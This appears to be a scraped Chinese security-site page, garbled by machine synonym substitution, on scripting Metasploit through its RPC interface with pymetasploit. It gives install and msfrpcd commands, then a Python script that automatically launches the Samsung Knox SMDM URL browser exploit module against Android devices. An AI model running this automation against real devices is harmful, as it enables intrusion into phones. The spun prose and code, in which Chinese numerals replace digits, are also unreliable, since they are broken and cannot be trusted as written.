|
|
|
联系客服020-83701501

Metasploit快速测试脚本的TIPS

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
Metasploit快捷测试脚本的TIPS 信托用过metasploit的同砚都很苦逼,msfconsole洗练的发动工夫,假定测试中敲错号令,或不警惕参与后又重启义务,会让你间接抓狂。之前不想反复敲号令,看了下metasploit的斥地文档,发现要被动化有各种规画,小我感到最不便的是调用RPC接口,GITHUB上搜了把,发现有大拿封装好了模块,间接调用便可:
安顿pymetasploit模块
Default
git clone https://github.com/allfro/pymetasploit
切到目次 Default
sudo python setup.py install
发动metasploit的RPC办事
Default
msfrpcd -P test -n -f -a 一2七.0.0.一
这个test是rpc办事的暗码,用户名默认是msf
定制本人的测试脚本
我这里定制的是测试3星knox漏洞的脚本,思路是每次发动先把之前运转的job和console停掉,而后被动创建一个console被动敲入号令遏制新的漏洞测试,间接crtl-c竣事脚本再重新测试凡是一个新的job,而且每次测试凡是秒开,不消再重启msfconsole了。两端各种接口怎样用,保举自身再翻下官方的文档。 Default
一234五六七89一0一1一2一3一4一五一六一七一8一9202一2223242五2六2七2829303一3233343五3六3七 from metasploit.msfrpc import MsfRpcClientimport time client = MsfRpcClient('test') jobs = client.call('job.list')for num in jobs.keys():    if jobs[num].find('samsung_knox_smdm_url')>0:        client.call('job.stop',num) console = client.call('console.list')for _console in console['consoles']:    if _console.has_key('prompt'):        if _console['prompt'].find('samsung_knox_smdm_url')>0:            client.call('console.destroy', _console['id']) cmd='''use exploit/android/browser/samsung_knox_smdm_urlset LHOST 一2七.0.0.一exploit''' res = client.call('console.create')console_id = res['id']client.call('console.write', console_id, cmd) try:    while True:        res = client.call('console.read',console_id)        if len(res['data']) > 一:                print res['data'],         if res['busy'] == True:                time.sleep(一)                continueexcept:    pass

[via@RAyh4c]

数安新闻+更多

证书相关+更多